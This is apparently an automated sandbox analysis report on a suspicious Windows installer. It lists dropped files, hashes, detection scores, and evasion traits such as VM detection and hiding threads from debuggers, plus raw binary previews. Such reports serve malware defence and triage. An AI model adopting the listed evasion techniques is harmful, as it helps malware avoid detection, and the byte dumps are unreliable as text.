33->51         started        53 26 other processes 33->53 signatures7 process8 file9 76 C:\...\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp, PE32 35->76 dropped 55 #U5b89#U88c5#U52a9#U624b_2.0.7.tmp 4 16 35->55         started        100 Loading BitLocker PowerShell Module 38->100 59 conhost.exe 38->59         started        61 WmiPrvSE.exe 38->61         started        signatures10 process11 file12 78 C:\Users\user\AppData\Local\...\update.vac, PE32 55->78 dropped 80 C:\Program Files (x86)\...\updat4.vac, PE32 55->80 dropped 82 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 55->82 dropped 84 3 other files (none is malicious) 55->84 dropped 102 Query firmware table information (likely to detect VMs) 55->102 104 Protects its processes via BreakOnTermination flag 55->104 106 Hides threads from debuggers 55->106 108 Contains functionality to hide a thread from the debugger 55->108 63 7zr.exe 2 55->63         started        66 7zr.exe 6 55->66         started        signatures13 process14 file15 88 C:\Program Files (x86)\...\tProtect.dll, PE32+ 63->88 dropped 68 conhost.exe 63->68         started        70 conhost.exe 66->70         started        process16

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
#U5b89#U88c5#U52a9#U624b_2.0.7.exe10%VirustotalBrowse
#U5b89#U88c5#U52a9#U624b_2.0.7.exe8%ReversingLabs
SourceDetectionScannerLabelLink
C:\Program Files (x86)\Windows NT\7zr.exe0%ReversingLabs
C:\Program Files (x86)\Windows NT\7zr.exe0%VirustotalBrowse
C:\Program Files (x86)\Windows NT\is-U9N4C.tmp0%ReversingLabs
C:\Program Files (x86)\Windows NT\is-U9N4C.tmp0%VirustotalBrowse
C:\Program Files (x86)\Windows NT\tProtect.dll9%ReversingLabs
C:\Program Files (x86)\Windows NT\tProtect.dll4%VirustotalBrowse
C:\Program Files (x86)\Windows NT\trash (copy)0%ReversingLabs
C:\Program Files (x86)\Windows NT\trash (copy)0%VirustotalBrowse
C:\Program Files (x86)\Windows NT\updat4.vac13%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-KS9P5.tmp\_isetup\_setup64.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-KS9P5.tmp\update.vac13%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-U4PSC.tmp\_isetup\_setup64.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-U4PSC.tmp\update.vac13%ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
https://aria2.github.io/Usage:#U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000001.00000003.1780028810.0000000004339000.00000004.00001000.00020000.00000000.sdmp, is-U9N4C.tmp.6.drfalse
    high
    https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU#U5b89#U88c5#U52a9#U624b_2.0.7.exefalse
      high
      https://github.com/aria2/aria2/issuesReport#U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000001.00000003.1780028810.0000000004339000.00000004.00001000.00020000.00000000.sdmp, is-U9N4C.tmp.6.drfalse
        high
        http://www.metalinker.org/#U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000001.00000003.1780028810.0000000004339000.00000004.00001000.00020000.00000000.sdmp, is-U9N4C.tmp.6.drfalse
          high
          https://www.remobjects.com/ps#U5b89#U88c5#U52a9#U624b_2.0.7.exe, 00000000.00000003.1716704365.000000007EFEB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.exe, 00000000.00000003.1716196291.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000001.00000000.1718548852.0000000000791000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000000.1783529044.000000000064D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp.0.dr, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp.5.drfalse
            high
            https://aria2.github.io/#U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000001.00000003.1780028810.0000000004339000.00000004.00001000.00020000.00000000.sdmp, is-U9N4C.tmp.6.drfalse
              high
              https://github.com/aria2/aria2/issues#U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000001.00000003.1780028810.0000000004339000.00000004.00001000.00020000.00000000.sdmp, is-U9N4C.tmp.6.drfalse
                high
                https://www.innosetup.com/#U5b89#U88c5#U52a9#U624b_2.0.7.exe, 00000000.00000003.1716704365.000000007EFEB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.exe, 00000000.00000003.1716196291.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000001.00000000.1718548852.0000000000791000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000000.1783529044.000000000064D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp.0.dr, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp.5.drfalse
                  high
                  http://www.metalinker.org/basic_string::_M_construct#U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000001.00000003.1780028810.0000000004339000.00000004.00001000.00020000.00000000.sdmp, is-U9N4C.tmp.6.drfalse
                    high
                    No contacted IP infos
                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1579756
                    Start date and time:2024-12-23 08:47:54 +01:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 10m 10s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Run name:Run with higher sleep bypass
                    Number of analysed new started processes analysed:110
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Critical Process Termination
                    Sample name:#U5b89#U88c5#U52a9#U624b_2.0.7.exe
                    renamed because original name is a hash value
                    Original Sample Name:_2.0.7.exe
                    Detection:MAL
                    Classification:mal88.evad.winEXE@141/32@0/0
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 74%
                    • Number of executed functions: 121
                    • Number of non-executed functions: 109
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                    • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                    • Exclude process from analysis (whitelisted): Conhost.exe, SIHClient.exe
                    • Excluded IPs from analysis (whitelisted): 20.12.23.50
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size exceeded maximum capacity and may have missing disassembly code.
                    • Report size getting too big, too many NtCreateKey calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    No simulations
                    No context
                    No context
                    No context
                    No context
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    C:\Program Files (x86)\Windows NT\7zr.exe#U5b89#U88c5#U52a9#U624b_2.0.5.exeGet hashmaliciousUnknownBrowse
                      #U5b89#U88c5#U52a9#U624b_2.0.4.exeGet hashmaliciousUnknownBrowse
                        #U5b89#U88c5#U52a9#U624b_2.0.5.exeGet hashmaliciousUnknownBrowse
                          #U5b89#U88c5#U52a9#U624b_2.0.4.exeGet hashmaliciousUnknownBrowse
                            Zt43pLXYiu.exeGet hashmaliciousUnknownBrowse
                              #U5b89#U88c5#U52a9#U624b_1.0.9.exeGet hashmaliciousUnknownBrowse
                                Zt43pLXYiu.exeGet hashmaliciousUnknownBrowse
                                  #U5b89#U88c5#U52a9#U624b_1.0.1.exeGet hashmaliciousUnknownBrowse
                                    #U5b89#U88c5#U52a9#U624b_1.0.8.exeGet hashmaliciousUnknownBrowse
                                      Process:C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):831200
                                      Entropy (8bit):6.671005303304742
                                      Encrypted:false
                                      SSDEEP:24576:A48I9t/zu2QSM0TMzOCkY+we/86W5gXKxZ5:Ae71MzuiehWIKxZ
                                      MD5:84DC4B92D860E8AEA55D12B1E87EA108
                                      SHA1:56074A031A81A2394770D4DA98AC01D99EC77AAD
                                      SHA-256:BA1EC2C30212F535231EBEB2D122BDA5DD0529D80769495CCFD74361803E3880
                                      SHA-512:CF3552AD1F794582F406FB5A396477A2AA10FCF0210B2F06C3FC4E751DB02193FB9AA792CD994FA398462737E9F9FFA4F19F095A82FC48F860945E98F1B776B7
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                      Joe Sandbox View:
                                      • Filename: #U5b89#U88c5#U52a9#U624b_2.0.5.exe, Detection: malicious, Browse
                                      • Filename: #U5b89#U88c5#U52a9#U624b_2.0.4.exe, Detection: malicious, Browse
                                      • Filename: #U5b89#U88c5#U52a9#U624b_2.0.5.exe, Detection: malicious, Browse
                                      • Filename: #U5b89#U88c5#U52a9#U624b_2.0.4.exe, Detection: malicious, Browse
                                      • Filename: Zt43pLXYiu.exe, Detection: malicious, Browse
                                      • Filename: #U5b89#U88c5#U52a9#U624b_1.0.9.exe, Detection: malicious, Browse
                                      • Filename: Zt43pLXYiu.exe, Detection: malicious, Browse
                                      • Filename: #U5b89#U88c5#U52a9#U624b_1.0.1.exe, Detection: malicious, Browse
                                      • Filename: #U5b89#U88c5#U52a9#U624b_1.0.8.exe, Detection: malicious, Browse
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9A..} ..} ..} ...<... ...?..~ ...<..t ...?..v ...?... ...(.| ..} ... ...(.t ..K.... ..k_..~ ..K...~ ..f."._ ...R..x ...&..| ..Rich} ..........PE..L....\.d.....................N......:.............@..........................@............@.....................................x........................&.......d......................................................H............................text.............................. ..`.rdata..RZ.......\..................@..@.data...ds... ......................@....sxdata.............................@....rsrc...............................@..@.reloc..2r.......t..................@..B................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):249984
                                      Entropy (8bit):7.999274308700479
                                      Encrypted:true
                                      SSDEEP:6144:YvUwQQJgh4lbr/CfQG1i2fhL55mDxwh6WJPc1EvqIY:Ych4BGfh1n5Wwh1JEO+
                                      MD5:EE4E379C02879163A818FB56A4AE3930
                                      SHA1:3124ECF5FE5EE3D368624A851F28F4FED189279C
                                      SHA-256:83D99487935BD7DFD0208D694CA3B9E848CA10A3C46FAF6F37D2DFA80FF79B70
                                      SHA-512:B198C0EC89917587B8A298469B960807B63EF15E0BDF20AD889AC0529B488D36BACC56B9064BC11365DD7AE1E47259DB6B72A1FB42821E08B57E15549369ADD4
                                      Malicious:false
                                      Preview:.@S....:....,...............o..).f}.....c...+Q....P.....I..q...C..psY...j...Q#>L.S.......n.....wN)=..'....Y.6..-+..H..M;..4....t.....Bs(.h...?4_.....d..e@4.....t8.._...P>.+5'R.k..,.2..M....`..1.N..h..,Z/.).B..4.1XR5p..U...nA)...E.....!....A.\..B..t,..Hn..8.a.g.!.....k#.....&...8Y.....Ar...H.?v...D.a..L3...8..>...d.MZCF.v..K....3.x.*A.r..._>...djA...M...eP.r.,f...'....D4..f}G..5....E.7u.p.u....f.....3y..f={.........l.q..,d[.........Q.]..jR'iQ.......Tk|.i.."...j^S.s.../.tm.......~f.w..6.M!....y..w.....&.......i.[...#.(vl..V.g?t...m..5TN.%........W..s....2....W...%.y&.6...Q._...Y+a..4.X.X..._\.4......_^.8Xm.p...J..1.....}.#...[.....\4P0_*..i..B..!\...R.O3Q.t.......E..?bv.{..W...Z.0.&q.j.....+`}...........H.b...)..M...D.Z.cr.c.J.m..Y.:..y....F.FQ<..3.s.@.w../....GF.PH.K+...._.......5.j1;6..j6|...W...e.\\}...t..-..y...OB....H....+..:g..B`.nb....2.o...T;...b.gv........2B..P1e..t..Q.k1;T..0^...R..).Z.@...+.c.uB.....\.6...C..I...8...n"
                                      Process:C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):249984
                                      Entropy (8bit):7.999274308700479
                                      Encrypted:true
                                      SSDEEP:6144:YvUwQQJgh4lbr/CfQG1i2fhL55mDxwh6WJPc1EvqIY:Ych4BGfh1n5Wwh1JEO+
                                      MD5:EE4E379C02879163A818FB56A4AE3930
                                      SHA1:3124ECF5FE5EE3D368624A851F28F4FED189279C
                                      SHA-256:83D99487935BD7DFD0208D694CA3B9E848CA10A3C46FAF6F37D2DFA80FF79B70
                                      SHA-512:B198C0EC89917587B8A298469B960807B63EF15E0BDF20AD889AC0529B488D36BACC56B9064BC11365DD7AE1E47259DB6B72A1FB42821E08B57E15549369ADD4
                                      Malicious:false
                                      Preview:.@S....:....,...............o..).f}.....c...+Q....P.....I..q...C..psY...j...Q#>L.S.......n.....wN)=..'....Y.6..-+..H..M;..4....t.....Bs(.h...?4_.....d..e@4.....t8.._...P>.+5'R.k..,.2..M....`..1.N..h..,Z/.).B..4.1XR5p..U...nA)...E.....!....A.\..B..t,..Hn..8.a.g.!.....k#.....&...8Y.....Ar...H.?v...D.a..L3...8..>...d.MZCF.v..K....3.x.*A.r..._>...djA...M...eP.r.,f...'....D4..f}G..5....E.7u.p.u....f.....3y..f={.........l.q..,d[.........Q.]..jR'iQ.......Tk|.i.."...j^S.s.../.tm.......~f.w..6.M!....y..w.....&.......i.[...#.(vl..V.g?t...m..5TN.%........W..s....2....W...%.y&.6...Q._...Y+a..4.X.X..._\.4......_^.8Xm.p...J..1.....}.#...[.....\4P0_*..i..B..!\...R.O3Q.t.......E..?bv.{..W...Z.0.&q.j.....+`}...........H.b...)..M...D.Z.cr.c.J.m..Y.:..y....F.FQ<..3.s.@.w../....GF.PH.K+...._.......5.j1;6..j6|...W...e.\\}...t..-..y...OB....H....+..:g..B`.nb....2.o...T;...b.gv........2B..P1e..t..Q.k1;T..0^...R..).Z.@...+.c.uB.....\.6...C..I...8...n"
                                      Process:C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
                                      File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                                      Category:dropped
                                      Size (bytes):5649408
                                      Entropy (8bit):6.392614480390128
                                      Encrypted:false
                                      SSDEEP:98304:jgRfP5jnFTyGZEWxSIBHVGT+t1ufqchZ:kRZDFTyGaHIJoWofqc
                                      MD5:8C71B86BF407C05BAF11E8D296B9C8B8
                                      SHA1:6624AB8CA883C48F02C58250D4EEE9E90098F4E4
                                      SHA-256:BE2099C214F63A3CB4954B09A0BECD6E2E34660B886D4C898D260FEBFE9D70C2
                                      SHA-512:BB3FEE727E40F8213F0A7D9808048E341295A684ECBA6F4DF52F1B07B528D7206CA41926B2433F4B63451565AD2854570FEE976BC7051B629ACD24FCA6D0F507
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................&.ZF..0V..<.............@..............................V.....L.V...`... ...............................................V../...........0O..............`V.\a...........................vL.(.....................V..............................text....XF......ZF.................`..`.data....z...pF..|...^F.............@....rdata.. 9....F..:....F.............@..@.pdata.......0O.......O.............@..@.xdata........Q.......Q.............@..@.bss.....;....U..........................idata.../....V..0....U.............@....CRT....h....@V.......U.............@....tls.........PV.......U.............@....reloc..\a...`V..b....U.............@..B................................................................................................................................................................................................................
                                      Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):56546
                                      Entropy (8bit):7.996814134856588
                                      Encrypted:true
                                      SSDEEP:1536:5ltaPvHpC96l8yuZs7O5xYc4l0Vw6FjTHkk78:5vaP/pI7G7ubQAw6R/8
                                      MD5:731DCEB356DC74ECD9DE5DD2323E44FA
                                      SHA1:65E0622ADE1BD3945E3D7860AAE4B32F00B3C8F3
                                      SHA-256:8F9A5351DDDF49F841EC2FD4375288745E3336D0A7A32B7D73404547BEDB0EB1
                                      SHA-512:D0DA6349F2041FB62F758C1CD8ED03BAD40ECAAB71495423EBE920FE7470B0F80B4DA5FAEFB0DE5E0C2F64200009B73671B254F7AA4D97E18071415C8E587D40
                                      Malicious:false
                                      Preview:.@S....j?..l ...............*.\..S.B..'^.q...?...B........kJ...qA.Qe.2H..y......2...N.A.....xAb..c...8.>_{..O7..f....N..b...]..?...O......V.A..M...{_.....\.w..x2.!X.....`..A....K...~u....i....A`.]........g.......8t......1...pS....t...5.... .......0.........|.V.. ..:.J..n;......F$....b1...S.]%.W...?...S0.g..o........"....7..e:........r.NqC....0..?H..T.\-..*.][....'..C|zEK.>.A.._....(%j...8v.l......p.r....X..%D..G.......%)|].c+N...>...cr"*.G...i~Sc]|.Y[N.....J. .YJ....K.bLpc ...G...R..f .A2."..P.\..G?@?N.-.:.A..l.<.+AW.j.$.m.T>.*e.E...>...1e.(... ...w....f....aB|l2..r.=..jZ..n.*...^0~.#.k.W....+..mt.....;.....R..z\.(v...L.....[.. tj /.w.C.#4r.[...I...M.}..].X.S..r..Y...H.4l.#.n.....`.....:..k...#...)....%....(Z..?~..[vE..0.|?....7..x...0..]....`..W.?..$Y........}.P..wW.I.%....p.......(......3.C(..)....V..=.=...m(..Y7.E(_./..jS2..I`...Ae..&.e.oSiH.D=...N.:..&..M....j.Z..8w..........Ys....;.q....M..\..j8.h...".^..%...=./^....-y._.........u.M...i.K
                                      Process:C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
                                      File Type:7-zip archive data, version 0.4
                                      Category:dropped
                                      Size (bytes):56546
                                      Entropy (8bit):7.996814134856595
                                      Encrypted:true
                                      SSDEEP:1536:IDxPHdRX/rHrANzavMASxNWt6F2SAXu6F:yXQzavM3WO2Lu6F
                                      MD5:EFA5A00025A30EB18D9C91B732AA1D0C
                                      SHA1:57F20B3F1A945CA875D746D678481867E14B277B
                                      SHA-256:55F744D7966908EB2BA0A81651E2D9CB5266F169639B47C5BF53E028CA4C1117
                                      SHA-512:B09460ED5607BACF05FCC9C5E01357DCF0E2532AB11E23A77210AFA4503D4F4E35B8A43B3C6B5EBE27EB748F530C778BCEAA0323BE220D06395E660CDB7792F6
                                      Malicious:false
                                      Preview:7z..'.............2.......f.n.&...(..I.\=9.).r...;...}...qgY..U..p..a..".M~4.z.....y.^L....BN.DD.E.........j.$...j..DI...........rN..q.5W}.T./...+Vk...{..Z..C...3.E..[.Ikce...>...jk4....M..m.R!..y..~....E..L...'.w....C...}vM!|.'4..3HmL..99*.a.`.HH..1Y^U_l.V.4..Ct...l....j.g@'.....5.._]......}...k....N.i9v.9ydGWW....}ze:H.$...l.Y..4'$.Z...OOUD.q.y..(.....h.>..tDB..m......E...w...iH....L...U.$Q.j.a..-..riE.F..~.Uy.F.F.i.....)..F2..@<................<...Fxpx..Z._..U..8y.+.....6E.O.R7.\...`..?....-.ti...].-.2.)T...K....!...t.........21.;.(...PP...N.Q...9...%.G.....;\S.M.m9_..2B....=."..4......dsP.g'..).w...-xdJG..K...-.A.g....Ug../......x.:....Y.R:t..G1.x.o..K.?k..l.%;.|\..#[...]...o.&.v...s.1.E.o.._i..Z?..j7&Pq. .q............4.x...5`./N...y..S..y.._~..._T.|t.(..g..a.E.p........p..jc....G.tj.....?..U....<}.v*.6...Y..cc.......Ay...Mr..YP.C..L.J....?..Xf.V./l.....!NDU8.?./..,I;#]!yqZ_-....9{X...#.\...<..!...0..n..n.*....p.5.y.Z..}.=.p.7.NH..E.G...*N.
                                      Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):56546
                                      Entropy (8bit):7.996966859255975
                                      Encrypted:true
                                      SSDEEP:1536:crCPEbYP46GiC3q6cGOlLvjmS9UWgvy/F2QFtTVAe:iCIR913q8wjmS9bhKe
                                      MD5:CEA69F993E1CE0FB945A98BF37A66546
                                      SHA1:7114365265F041DA904574D1F5876544506F89BA
                                      SHA-256:E834D26D571776C889E2D09892C6E562EA62CD6524D8FC625E6496A1742F5DBB
                                      SHA-512:4BCBB5AD50446CD4FAD5ED3C530E29CC9DD7DDCB7B912D7C546AF8CCF7DA74BC1EEC397846BFB97858BABC9AA46BB3F3D0434F414BBC3B15B9FDBB7BF3ED59F9
                                      Malicious:false
                                      Preview:.@S....c...l ...............3...Q...R]..u&.(..c...o.A..q?oIS.j..O[..o..&....L)......Rm.jC,./....-=...Z.;..7..tH..f...n#.7.P#..#o..D..y....m........zH.!...M.|......Vs.^.Rb.X`....y.T.Sg....T.....E.?/.H.;h.)P.#.pz.LOG$..."L(.....?.D*.6g.J!.>.....f.....J..B..q...;w]9.v...V...$....L/m.H#..]...G....QQ..'.z.!NW~..R..y....E.)....m.k%....+....>....02../..M....b.l..f7..f?-~_..E.5.~....*.'....8?.n........x...#....9.........q.q.n...\....D.Uv9.9...P.j7P~q9[BV...>C..[F..k-UL(jfT..\..{d.v;.5.e.fb.3^+...Z|]S3G...$..H=.W..c...B...).v.D!...s...+.K...~=..l.2...X.m.-....m0.....p...>...d......e.J..gUr*4....vw.........T.cQ......\...]...Z{..q..n..'Ql.$..V.U9..j 4...9<..6i.....5.F.).k.LQ4.H...2..p.*.bQJ..4.K'C...#.%"q.u../zoXL...L...........'..g11=E.....y.8...~.Oe..X....u.M8.T.....Qq.m.........i....F.4e.([Hm.*...E....2........s. *R..{."4.x.]...-.....xQ@.z.......Bz.).[..C...T..".....q............M.X..CQ..A..........d...`S.3...e.X.....u.>.!..;k...>..
                                      Process:C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
                                      File Type:7-zip archive data, version 0.4
                                      Category:dropped
                                      Size (bytes):56546
                                      Entropy (8bit):7.996966859255979
                                      Encrypted:true
                                      SSDEEP:1536:cWsX30GkPK2rw7bphKKdxDBxjqtalDFMflaX4:cZXhkPhr+TRJqtaK
                                      MD5:4CB8B7E557C80FC7B014133AB834A042
                                      SHA1:C42E2C861FF3ED0E6A11824E12F67A344E8F783D
                                      SHA-256:3EC6A665E7861DC29A393D00EAA00989112E85C6F1B9643CA6C39578AD772084
                                      SHA-512:A88E78258F7DB4AECD02F164E6A3AFCF39788E30202CF596F9858092027DDB2FDB66D751013A7ABA5201BFAFF9F2D552D345AFE21C8E1D1425ABBC606028C2E6
                                      Malicious:false
                                      Preview:7z..'....O; ........2.......D.X..Z.2..7nf..R..s# s..v.f.....%G..>..9..Jh.-j.r..q.2.=v..Q.....SW7....im..|.c...&...,.s....f.h...C.g~..f.7=9...,...sd....iD......cR.^...$..<....nd...S.O..E)0..SQ.AA.C..$.D.|. a.:..5.....b.....2......W.....Z.pS.b/.F.;|`...O/....@.......4.".b.(...4...,..h/.K$..r!...."..`.S...D?.":...n..f.{C..t..,/.S.0.N..M...v...(.Yn..-.)..-...N~....}..).. .j!...1H.7?R..X.....rKi....9.i[k..+.....Br\.=.k.t8...6Lmh.../.V^K.f.......*.@MM..`...,W.......E..v.H....0.W..~....I.....w....<....X.Azl.FH..6\.a..E?=..I.q.5...s...;.,J.0..J.../.w..,..n.EkN..,j....f.y&q.C}fnY..2\......0.....N!.J..H.H0.....BJ.Q..v}=......^c.'w..#...d.T1....#...2s}N.....2.%.?. ....l.).....a<5Y.s....}...2*.#s..]0h..._G....3].....7y.}.B.6...ywE....'q.....h..?p .#..Emm2..F..| .M.Rv!.v.G....1L.Kx...T...".a6.%S0..g..7.......J.vjO.{.A....B@.c.y>}.....N.+....:.L=[....._.....Y.{....F..|.w.oX..t&[.....a\.M..2.Qe.[}L.Ch[...G.S#.$9...8<..W.d1...*PH.`.....4.A.......?..g.
                                      Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):31890
                                      Entropy (8bit):7.99402458740637
                                      Encrypted:true
                                      SSDEEP:768:rzwmoD5r754TWCxhazPt9GNgRYpSj3PsQ4yVb595nQ/:vwmolXaT9abVzP1TC
                                      MD5:8622FC7228777F64A47BD6C61478ADD9
                                      SHA1:9A7C15F341835F83C96DA804DC1E21FDA696BB56
                                      SHA-256:4E5C193D58B43630E16B6E86C7E4382B26C9A812D6D28905DD39BC7155FEBEE1
                                      SHA-512:71F31079B6C3CE72BC7238560B2CBD012A0285B6A5AC162B18EAE61A059DD3B8DBCF465225E1FB099A1E23ED7BDDF0AAE4ED7C337A10DC20E0FEEC4BC73C5441
                                      Malicious:false
                                      Preview:.@S......................xi.\ .~.#..:}..fy?koGL^|kH.G...........x....Tg.Y.t....~^..".L.41.....R..|.....R...C.m(.M&...q.v.$..i..U.....).PY.......O.....~..p.u.Y.......{...5^q.|a.]..@DP".`Rz}...|N.uSW.......^..o...U..z...3...bH........p.......Y`..b.t.x.F^i.<.%.r.o..?w.Z..M.fI.!.a...Zsb.+.y..W...n.....;...........|.{.@Q.....#".M...4.A).#;..r...>E..]w{.-....B...........v..`...S...sY....h.Sa)...r.3.U;n8wXq.x...@^z...%8H.Zd._..f~.....u[..q$..%......C..../].rS.....".=..<o.<S....-^"..iIX..r...D.......k.P.e...U..n.]^p..pal....E.c..+..Gc..U?s.R...p...:>..v..o2..B.Hn..q...F..3.o...%.......C......*.V..|..2.J..i.r....|;T.C6).......a..~"K....Y.....]3.{{..N...X>.1.....:?....,..T+=s...............so.;....&....Q.\K..b............k,..#l...Yb...VE.g.3v.$'.H3......w.....{f..e.....PS.tQ..*.8a....5w....\8%..c.;......q.j.t0/.8s..(9....... .S...0.o.o......f*..]....U..>N....Kc/..ka.I"O-O.!./..S".IN .....%G...........x%..ZL`Sq.;.}w.`..k.....F.........Tp..}..?t..
                                      Process:C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
                                      File Type:7-zip archive data, version 0.4
                                      Category:dropped
                                      Size (bytes):31890
                                      Entropy (8bit):7.99402458740637
                                      Encrypted:true
                                      SSDEEP:768:jh43RfBLJT55mgLMoqX3gX/i69sXCuWegxJr8qF88M:qhj+I7qCKNSegPnFM
                                      MD5:CE6034AFC63BB42F4E0D6CD897DFBCB8
                                      SHA1:49E6E67EB36FE2CCAA42234A1DBB17AA2B1C7CC0
                                      SHA-256:7B7EB1D44ED88E7C19A19CEDAA25855F6800B87EC7E76873F3EA4D6A65DAA25F
                                      SHA-512:7801FA33C19D6504FF2D84453F4BB810FD579CB0C8772871F7CC53E90B835114D0221224A1743C0F5AAE76C658807CC9B4EC3BEC2CAD4AB8C3FD03203DAA7CF0
                                      Malicious:false
                                      Preview:7z..'....oYU@|......2.........Z....f..t.#.............tb.7E..Jo.........b.I=.Y..6(..=....^..>i.^E.."q.$&8....N...p+.p. .P.z6.b,.8kdD......'...G.R.n.&5..C..H.E..So!T^n{.a#d....z.SB........Nb.........LO+B ...iV..HH.Cc*.o@|.....Yvxb^.cW....._.........m.}.(V.i.H$....R....`.M.p......A?....._..nb..D.*RT<bUV.n].....LD.qU.....U9....]...h..y!...I....&C......g`...YahZ.q4.{.....2ZRG..f.. .M....:t .........8..Eg.....o.....h.]{..........p...M...lh.@.(R.]!B.:...b78$...b.......hc...C~....I..B<.x_OB|...<. .=NZ.....z........sjJ.....*{<..L.......^...9..^d..$d..}......#.dL'~.}....M...j.(5..@.tcVm.H..-.n...D..&....<..Z...@]./7?...[..qfW..!...v...==..d..M..om~).....C..9....c<..WUV.ed.h...]....OCt(X.H<<:.9..{5j....Nh.L.$..>..D..haP..~...............}r=!.E.ng..........9+...2.g.H3Lx.Bu....]jC...q.g.g.U.4..<........)....oo.T.c_.......X.,.@...nu......D.B(~.5....x5...............4S7B..p...Uk.0-m.VM.M@.V\.o...(......".k..w....Z.([.@.MQ.i9..."W..m...N.,.
                                      Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):74960
                                      Entropy (8bit):7.99759370165655
                                      Encrypted:true
                                      SSDEEP:1536:x2PlxAOr0Y07RqyjjkFThaVNwDsKsNFBrFYek36pX4MDVuPFOnfIId+:QAOrf07RHjkFThaVGMLF3hNDcPFOn5s
                                      MD5:950338D50B95A25F494EE74E97B7B7A9
                                      SHA1:F56A5D6C40BC47869A6AE3BC5217D50EA3FC1643
